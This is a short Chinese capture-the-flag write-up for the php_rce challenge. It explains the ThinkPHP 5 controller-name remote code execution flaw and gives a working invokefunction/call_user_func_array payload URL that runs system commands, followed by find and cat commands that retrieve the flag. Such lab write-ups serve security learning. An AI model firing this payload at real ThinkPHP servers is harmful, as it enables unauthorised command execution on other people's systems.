提示:本人24小时在线如有疑问,可联系我!
前言
提示:攻防世界php_rce
一、题目?
看题目
像是笑脸漏洞!
二、解决
1.ThinkPHP 5漏洞简介
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
2.漏洞分析
程序未对控制器进行过滤,导致攻击者可以用 \(斜杠)调用任意类方法。
将url改变为
http://61.147.171.105:62914/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
其中:vars[1][]=(Linux指令)
3.找flag文件
还记得嘛?
find / -name "flag*"
哇!!!
吆西吆西
还是试试
find / -name "flag"
cat /flag #查看目录/flag
结果
flag{thinkphp5_rce}